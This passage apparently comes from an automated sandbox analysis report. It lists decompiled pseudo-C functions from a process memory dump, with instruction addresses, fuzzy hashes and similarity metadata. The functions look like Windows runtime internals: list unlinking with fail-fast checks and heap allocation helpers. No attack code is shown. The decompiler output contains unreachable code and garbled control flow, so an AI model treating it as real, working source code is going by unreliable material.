				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E036395D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E036395D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E035F9325();
					_t50 =  *0x36e84c4; // 0x0
					return E0364D0D1(L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x035f9240
0x035f9242
0x035f9247
0x035f924c
0x035f924e
0x035f9255
0x035f9257
0x035f925a
0x035f925f
0x035f925f
0x035f9266
0x035f9271
0x035f9276
0x035f9279
0x035f927e
0x035f9295
0x035f929a
0x035f92b1
0x035f92b6
0x035f92d7
0x035f92dc
0x035f92e0
0x035f92e6
0x035f92e8
0x035f92ee
0x035f9332
0x035f9333
0x035f9337
0x035f9338
0x035f933a
0x035f933a
0x035f933d
0x035f9342
0x035f9342
0x035f9345
0x035f9349
0x035f934e
0x035f9352
0x035f9357
0x035f92f4
0x035f92f4
0x035f92f6
0x035f92f9
0x035f9300
0x035f9306
0x035f9324
0x035f9324

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7d4d630223fc041689ff6980ed839b67ab3d9baedef159f499fe23a7d3cfb68
Instruction ID: e0375daf44bb47a6454c77f604abf6a1605476bc13275b153cc93f23ec4ebb9e
Opcode Fuzzy Hash: d7d4d630223fc041689ff6980ed839b67ab3d9baedef159f499fe23a7d3cfb68
Instruction Fuzzy Hash: 2D212536541A40DFC722EF28DA40F1AB7F9FF08B04F18456CE1498B6A2CB35E955CB58

Uniqueness

Uniqueness Score: -1.00%

Function 03684257, Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E03684257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x36d08d0);
				E0364D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E036841E8(__ebx, __edi, __ecx, _t39);
				E0360EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x36e87e4;
					_t18 =  *0x36e87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x36e5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x36e87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x36e87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L035F7055(_t31 + 0xfffffff8);
								_t24 =  *0x36e87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x36e87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x36e5cd0;
				if( *0x36e5cd0 <= 0) {
					L035F7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x36e87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x36e87e8 = _t30;
						 *0x36e87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E0364D0D1(L03684320());
			}

0x03684257
0x03684257
0x03684257
0x03684259
0x0368425e
0x03684263
0x03684265
0x03684273
0x03684278
0x0368427c
0x0368427f
0x03684281
0x03684287
0x036842d7
0x036842d7
0x036842da
0x0368428d
0x0368428d
0x0368428f
0x03684292
0x03684297
0x0368429c
0x036842a0
0x036842a6
0x036842a8
0x036842ae
0x036842b3
0x00000000
0x036842ba
0x036842ba
0x036842bf
0x036842c5
0x036842ca
0x036842cf
0x036842d0
0x00000000
0x036842d0
0x036842b3
0x00000000
0x036842a6
0x0368429c
0x036842dc
0x036842dc
0x036842e3
0x03684309
0x036842e5
0x036842e5
0x036842e8
0x036842ee
0x036842f0
0x00000000
0x036842f2
0x036842f2
0x036842f4
0x036842f7
0x036842f9
0x03684300
0x03684300
0x036842f0
0x0368430e
0x0368431f

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfa3687eec84034ae110eecc7cbf8a3b923a6c2d75fdfe2408e7f90b37c578a
Instruction ID: e56d1873e8893cc69cf74f37499fe299260e86ff6d28aef5eb4f5f382270b721
Opcode Fuzzy Hash: 8cfa3687eec84034ae110eecc7cbf8a3b923a6c2d75fdfe2408e7f90b37c578a
Instruction Fuzzy Hash: E5217774900716CFCB16FF26D214A58BBB0FF89754B5492AEC1058F398DB31C485CB08

Uniqueness

Uniqueness Score: -1.00%

Function 03622397, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E03622397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x36e848c != 0) {
					L0361FAD0(0x36e8610);
					if( *0x36e848c == 0) {
						E0361FA00(0x36e8610, _t19, _t27, 0x36e8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E03622581(0x36e8610, 0x35d50a0, _t26, _t27, _t28);
						E0361FA00(0x36e8610, 0x35d50a0, _t27, 0x36e8610);
					}
				} else {
					L1:
					_t11 =  *0x36e8614; // 0x0
					if(_t11 == 0) {
						_t11 = E03634886(0x35d1088, 1, 0x36e8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E03622581(0x36e8610, (_t11 << 4) + 0x35d5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x036223b0
0x036223b6
0x03622409
0x03622415
0x03665ae9
0x00000000
0x0362241b
0x0362241b
0x0362241d
0x03622427
0x0362242e
0x03622430
0x03622430
0x036223b8
0x036223b8
0x036223b8
0x036223bf
0x036223fc
0x036223fc
0x036223c1
0x036223c3
0x036223d0
0x036223d8
0x036223d8
0x036223dc
0x036223de
0x036223e1
0x036223e1
0x036223ec

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 491ffe345fbd98a815cddf9631516a46db33ea380669d1223352b1362d9ca63b
Instruction ID: bcfca6c36dcb31d7ae8895c1b2f736d5c7a5626877d34ba016d9e950c798d9c2
Opcode Fuzzy Hash: 491ffe345fbd98a815cddf9631516a46db33ea380669d1223352b1362d9ca63b
Instruction Fuzzy Hash: 3011823234071497D370EA29AD50F15BBCCFB50A50F098819F506DF250CBF4D8458B58

Uniqueness

Uniqueness Score: -1.00%

Function 036746A7, Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E036746A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L03614620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0363F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E0362D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L036177F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x036746b7
0x036746ba
0x036746c5
0x036746c8
0x036746d0
0x036746d4
0x036746e6
0x036746e9
0x036746f4
0x036746ff
0x03674705
0x03674706
0x0367470c
0x03674713
0x0367471b
0x03674723
0x03674725
0x036746d6
0x036746d9
0x036746db
0x036746db
0x03674732

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: abc8495ceb01f83288d89bc669d09e0886d098cc3179b3fe1d3fa2f32bdecd1e
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: ED11E576904208BBC716DF6DD8808BEBBB9EF95304F1480AEF944CB350DA318D65D7A9

Uniqueness

Uniqueness Score: -1.00%

Function 035FC962, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E035FC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x36ed360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E0360EEF0(0x36e70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0367F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0360EB70(_t29, 0x36e70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0363B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0367F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x36e70c0; // 0x0
					while(_t38 != 0x36e70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x36eb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x035fc96a
0x035fc974
0x035fc988
0x035fc98a
0x03667c9d
0x03667c9f
0x03667ca4
0x03667cae
0x03667cf0
0x03667cf5
0x03667cfa
0x035fc992
0x035fc996
0x035fc997
0x035fc998
0x035fc9a3
0x035fc9a3
0x03667cb0
0x03667cb7
0x03667cbb
0x00000000
0x00000000
0x03667cbd
0x03667ce8
0x03667cc5
0x03667cc8
0x03667cca
0x03667cd0
0x03667cd6
0x03667cde
0x03667ce4
0x03667ce4
0x03667cd0
0x00000000
0x03667ce8
0x035fc990
0x00000000

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5679aecfb2653b1e427aeb1a43f731011bd02a7228b4651209ccc8433bb8689
Instruction ID: ed6afd335d4c7ab13cc533e8cae2b684a268d0538bfba764edb91ee1572ce1e6
Opcode Fuzzy Hash: f5679aecfb2653b1e427aeb1a43f731011bd02a7228b4651209ccc8433bb8689
Instruction Fuzzy Hash: D211E1313107469FC710EF28ED85A2BBBE5BF85659F04052CE8418B651DB20ED14C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 036337F5, Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E036337F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E03612280(_t6, 0x36e8550);
				}
				_t29 = E0363387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E0360FFB0(0x36e8550, _t27, 0x36e8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L036177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x036337fa
0x036337fc
0x03633805
0x03633808
0x03633808
0x03633814
0x03633818
0x03633846
0x03633848
0x0363384b
0x0363384b
0x03633852
0x00000000
0x03633854
0x03633856
0x00000000
0x00000000
0x03633863
0x00000000
0x03633863
0x0363381a
0x0363381a
0x0363381f
0x0363386e
0x0363386e
0x03633871
0x03633873
0x03633873
0x03633868
0x00000000
0x03633868
0x03633821
0x03633826
0x00000000
0x00000000
0x03633828
0x0363382a
0x03633841
0x00000000
0x03633841

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a1d934a5cb5c8bb4560af7bddd0a84d28cc25a0a6ad765f9fb569395dca1d82
Instruction ID: f9a1b860519d148d96134bf8f092dc6e639a3ae85832e9e8d2eda078a3404932
Opcode Fuzzy Hash: 8a1d934a5cb5c8bb4560af7bddd0a84d28cc25a0a6ad765f9fb569395dca1d82
Instruction Fuzzy Hash: 3601967AA016109BC337DB199A40E26BBAADF87B5072944ADE9458F315DB34D801C794

Uniqueness

Uniqueness Score: -1.00%

Function 0362002D, Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0362002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E03617D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E03617D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E03617D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E03617D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}

0x03620032
0x03620037
0x03620043
0x03664b3a
0x03620049
0x03620049
0x03620049
0x0362004e
0x03620053
0x03664b48
0x03664b5a
0x03664b4a
0x03664b53
0x03664b53
0x03664b5f
0x00000000
0x03664b61
0x00000000
0x03664b61
0x03620059
0x03620059
0x03620060
0x03664b6f
0x03664b6f
0x03620069
0x03664b83
0x00000000
0x00000000
0x03664b90
0x03664b9b
0x03664b9b
0x03664ba4
0x00000000
0x00000000
0x03664baa
0x00000000
0x0362006f
0x0362006f
0x00000000
0x0362006f
0x03620069

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction ID: bd9fa47d174b00bd3c5b81991df7a5c45e9d8750ac0077e8ccdc1d81d40023c1
Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
Instruction Fuzzy Hash: 1411DB35605A918FE723DB65D644B357BF8EF41794F0E00E8DD048B792DB28D881CA64

Uniqueness

Uniqueness Score: -1.00%

Function 0360766D, Relevance: .1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0360766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E0362F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0362F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03614620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}

0x03607672
0x0360767f
0x03607689
0x036076de
0x036076de
0x0360768b
0x03607691
0x03607693
0x03607697
0x00000000
0x03607699
0x036076a8
0x00000000
0x036076aa
0x036076ad
0x036076b1
0x00000000
0x036076b3
0x036076b3
0x036076b5
0x036076ba
0x036076bc
0x036076bc
0x036076c0
0x00000000
0x036076c2
0x036076ce
0x036076ce
0x036076c0
0x036076b1
0x036076a8
0x03607697
0x036076d9

Memory Dump Source

Source File: 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp, Offset: 035D0000, based on PE: true

Associated: 00000009.00000002.484618499.00000000036EB000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.484634068.00000000036EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction ID: cb013e67d826f4486b86e66cc7cff1037b805057c342f3932d22c2819b757ec5
Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
Instruction Fuzzy Hash: DB018D72B101196BC714DE5ECD41E5FB7ADEB44660B250524B905CF390DA31ED11C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 035F9080, Relevance: .1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E035F9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x36e85ec;
				E03612280(_t48, 0x36e85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0360FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x36e538c; // 0x77f06848
					if( *_t84 != 0x36e5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x36cf6e8);
						E0364D0E8(0x36e85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E036C88F5(_t80, _t85, 0x36e5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x36e86c0; // 0xfa07b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x36e86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03612280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E036C88F5(0x36e85ec, _t85, 0x36e5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0363AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x36eb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x36e84c0;
																			if(_t82 >=  *0x36e84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E036C9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E035F922A(_t99);
										_t64 = E03617D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E036C8B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x36e86c0; // 0xfa07b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x36e86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x36e86bc;
													_t87 = 0x36e86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E035F9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x36e86c4;
												_t87 = 0x36e86c0;
												L27:
												E03629B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0364D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x36e5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x36e538c = _t51;
						goto L6;
					}
				}
			}

0x035f9082
0x035f9083
0x035f9084
0x035f9085
0x035f9087
0x035f9096
0x035f9098
0x035f9098
0x035f909e
0x035f90a8
0x035f90e7
0x035f90e7
0x035f90aa
0x035f90b0
0x035f90b7
0x035f90bd
0x035f90dd
0x035f90e6
0x035f90bf
0x035f90bf
0x035f90c7
0x035f90cf
0x035f90f1
0x035f90f2
0x035f90f4
0x035f90f5
0x035f90f6
0x035f90f7
0x035f90f8
0x035f90f9
0x035f90fa
0x035f90fb
0x035f90fc
0x035f90fd
0x035f90fe
0x035f90ff
0x035f9100
0x035f9102
0x035f9107
0x035f910c
0x035f9110
0x035f9113
0x035f9115
0x035f9136
0x035f913f
0x035f9143
0x036537e4
0x036537e4
0x035f9117
0x035f9117
0x035f911d
0x00000000
0x035f911f
0x035f911f
0x035f9125
0x00000000
0x035f9127
0x035f912d
0x035f9130
0x035f9134
0x035f9158
0x035f915d
0x035f9161
0x035f9168
0x03653715
0x035f916e
0x035f916e
0x035f9175
0x035f9177
0x035f917e
0x035f917f
0x035f9182
0x035f9182
0x035f9187
0x035f9187
0x035f918a
0x035f918d
0x035f918f
0x035f9192
